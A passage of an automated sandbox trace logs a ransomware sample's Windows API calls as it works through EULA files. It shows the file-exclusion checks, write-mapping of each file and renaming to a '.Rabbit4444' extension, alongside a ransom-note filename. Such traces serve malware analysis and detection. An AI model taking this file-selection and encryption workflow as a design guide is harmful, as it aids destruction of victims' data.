(in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0047.703] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13901382889) returned 1 [0047.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0047.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0047.703] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.706] CloseHandle (hObject=0x298) returned 1 [0047.706] CloseHandle (hObject=0x278) returned 1 [0047.711] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm.Rabbit4444") returned 63 [0047.711] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.712] InterlockedExchangeAdd (in: Addend=0xff618, Value=254160 | out: Addend=0xff618) returned 14010384 [0047.712] InterlockedExchangeAdd (in: Addend=0xff624, Value=9 | out: Addend=0xff624) returned 3235 [0047.712] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5ed27d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5ed27d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x12581, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_tr-tr.htm", cAlternateFileName="EULA_T~2.HTM")) returned 1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="Rabbit4444.exe") returned -1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2=".") returned 1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="..") returned 1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="windows") returned -1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="bootmgr") returned 1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="pagefile.sys") returned -1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="boot") returned 1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="ids.txt") returned -1 [0047.712] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="NTUSER.DAT") returned -1 [0047.712] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_tr-tr.htm" | out: lpString1="EULA_tr-tr.htm") returned="EULA_tr-tr.htm" [0047.712] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm", dwFileAttributes=0x0) returned 1 [0047.713] lstrlenW (lpString="EULA_tr-tr.htm") returned 14 [0047.713] lstrlenW (lpString="Rabbit4444") returned 10 [0047.713] lstrcmpiW (lpString1="_tr-tr.htm", lpString2="Rabbit4444") returned -1 [0047.713] lstrlenW (lpString=".dll") returned 4 [0047.713] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.713] lstrlenW (lpString=".lnk") returned 4 [0047.713] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.713] lstrlenW (lpString=".ini") returned 4 [0047.713] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.713] lstrlenW (lpString=".sys") returned 4 [0047.713] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.713] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.713] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.713] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13902384955) returned 1 [0047.722] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=75137) returned 1 [0047.722] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0047.722] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0047.722] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12890, lpName=0x0) returned 0x298 [0047.723] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12890) returned 0x70000 [0047.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0047.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0047.728] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13903842479) returned 1 [0047.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0047.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0047.728] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.729] CloseHandle (hObject=0x298) returned 1 [0047.729] CloseHandle (hObject=0x278) returned 1 [0047.731] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm.Rabbit4444") returned 63 [0047.731] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.732] InterlockedExchangeAdd (in: Addend=0xff618, Value=75152 | out: Addend=0xff618) returned 14264544 [0047.732] InterlockedExchangeAdd (in: Addend=0xff624, Value=14 | out: Addend=0xff624) returned 3244 [0047.732] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5ed27d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5ed27d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x411eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_uk-ua.htm", cAlternateFileName="EULA_U~1.HTM")) returned 1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="Rabbit4444.exe") returned -1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2=".") returned 1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="..") returned 1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="windows") returned -1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="bootmgr") returned 1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="pagefile.sys") returned -1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="boot") returned 1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="ids.txt") returned -1 [0047.732] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="NTUSER.DAT") returned -1 [0047.732] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_uk-ua.htm" | out: lpString1="EULA_uk-ua.htm") returned="EULA_uk-ua.htm" [0047.732] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm", dwFileAttributes=0x0) returned 1 [0047.733] lstrlenW (lpString="EULA_uk-ua.htm") returned 14 [0047.733] lstrlenW (lpString="Rabbit4444") returned 10 [0047.733] lstrcmpiW (lpString1="_uk-ua.htm", lpString2="Rabbit4444") returned -1 [0047.733] lstrlenW (lpString=".dll") returned 4 [0047.733] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.733] lstrlenW (lpString=".lnk") returned 4 [0047.734] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.734] lstrlenW (lpString=".ini") returned 4 [0047.734] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.734] lstrlenW (lpString=".sys") returned 4 [0047.734] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.734] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.734] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.734] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13904457844) returned 1 [0047.734] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=266731) returned 1 [0047.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0047.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0047.734] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x414f0, lpName=0x0) returned 0x298 [0047.735] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x414f0) returned 0x70000 [0047.743] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.743] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.744] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.744] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0047.744] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.744] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0047.744] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.744] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.744] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13905467645) returned 1 [0047.744] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0047.744] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0047.744] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.746] CloseHandle (hObject=0x298) returned 1 [0047.747] CloseHandle (hObject=0x278) returned 1 [0047.754] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm.Rabbit4444") returned 63 [0047.754] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.755] InterlockedExchangeAdd (in: Addend=0xff618, Value=266736 | out: Addend=0xff618) returned 14339696 [0047.755] InterlockedExchangeAdd (in: Addend=0xff624, Value=10 | out: Addend=0xff624) returned 3258 [0047.755] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5ed27d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5ed27d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1ed21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_zh-cn.htm", cAlternateFileName="EULA_Z~1.HTM")) returned 1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="Rabbit4444.exe") returned -1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2=".") returned 1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="..") returned 1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="windows") returned -1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="bootmgr") returned 1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="pagefile.sys") returned -1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="boot") returned 1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="ids.txt") returned -1 [0047.755] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="NTUSER.DAT") returned -1 [0047.755] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_zh-cn.htm" | out: lpString1="EULA_zh-cn.htm") returned="EULA_zh-cn.htm" [0047.755] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm", dwFileAttributes=0x0) returned 1 [0047.756] lstrlenW (lpString="EULA_zh-cn.htm") returned 14 [0047.756] lstrlenW (lpString="Rabbit4444") returned 10 [0047.756] lstrcmpiW (lpString1="_zh-cn.htm", lpString2="Rabbit4444") returned -1 [0047.756] lstrlenW (lpString=".dll") returned 4 [0047.756] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.756] lstrlenW (lpString=".lnk") returned 4 [0047.756] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.756] lstrlenW (lpString=".ini") returned 4 [0047.756] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.756] lstrlenW (lpString=".sys") returned 4 [0047.756] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.756] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.756] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.756] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13906683237) returned 1 [0047.756] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=126241) returned 1 [0047.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0047.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0047.756] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f030, lpName=0x0) returned 0x298 [0047.757] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f030) returned 0x70000 [0047.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0047.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0047.763] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13907340587) returned 1 [0047.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0047.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0047.763] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.764] CloseHandle (hObject=0x298) returned 1 [0047.764] CloseHandle (hObject=0x278) returned 1 [0047.768] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm.Rabbit4444") returned 63 [0047.768] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.769] InterlockedExchangeAdd (in: Addend=0xff618, Value=126256 | out: Addend=0xff618) returned 14606432 [0047.769] InterlockedExchangeAdd (in: Addend=0xff624, Value=6 | out: Addend=0xff624) returned 3268 [0047.769] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x23ec4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_zh-hk.htm", cAlternateFileName="EULA_Z~2.HTM")) returned 1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="Rabbit4444.exe") returned -1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2=".") returned 1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="..") returned 1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="windows") returned -1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="bootmgr") returned 1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="pagefile.sys") returned -1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="boot") returned 1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="ids.txt") returned -1 [0047.769] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="NTUSER.DAT") returned -1 [0047.769] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_zh-hk.htm" | out: lpString1="EULA_zh-hk.htm") returned="EULA_zh-hk.htm" [0047.769] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm", dwFileAttributes=0x0) returned 1 [0047.770] lstrlenW (lpString="EULA_zh-hk.htm") returned 14 [0047.770] lstrlenW (lpString="Rabbit4444") returned 10 [0047.770] lstrcmpiW (lpString1="_zh-hk.htm", lpString2="Rabbit4444") returned -1 [0047.770] lstrlenW (lpString=".dll") returned 4 [0047.770] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.770] lstrlenW (lpString=".lnk") returned 4 [0047.770] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.770] lstrlenW (lpString=".ini") returned 4 [0047.770] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.770] lstrlenW (lpString=".sys") returned 4 [0047.770] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.770] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.770] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.770] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13908074218) returned 1 [0047.770] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=147140) returned 1 [0047.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0047.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0047.770] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x241d0, lpName=0x0) returned 0x298 [0047.771] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x241d0) returned 0x70000 [0047.776] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.776] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0047.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.776] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.776] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0047.777] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13908761057) returned 1 [0047.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0047.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0047.777] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.778] CloseHandle (hObject=0x298) returned 1 [0047.778] CloseHandle (hObject=0x278) returned 1 [0047.783] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm.Rabbit4444") returned 63 [0047.783] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.783] InterlockedExchangeAdd (in: Addend=0xff618, Value=147152 | out: Addend=0xff618) returned 14732688 [0047.783] InterlockedExchangeAdd (in: Addend=0xff624, Value=6 | out: Addend=0xff624) returned 3274 [0047.783] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x23ec4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_zh-tw.htm", cAlternateFileName="EULA_Z~3.HTM")) returned 1 [0047.783] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.783] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.783] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="Rabbit4444.exe") returned -1 [0047.783] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2=".") returned 1 [0047.783] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="..") returned 1 [0047.783] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="windows") returned -1 [0047.783] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="bootmgr") returned 1 [0047.784] lstrcmpiW (lpString1="EULA_zh-tw.htm", 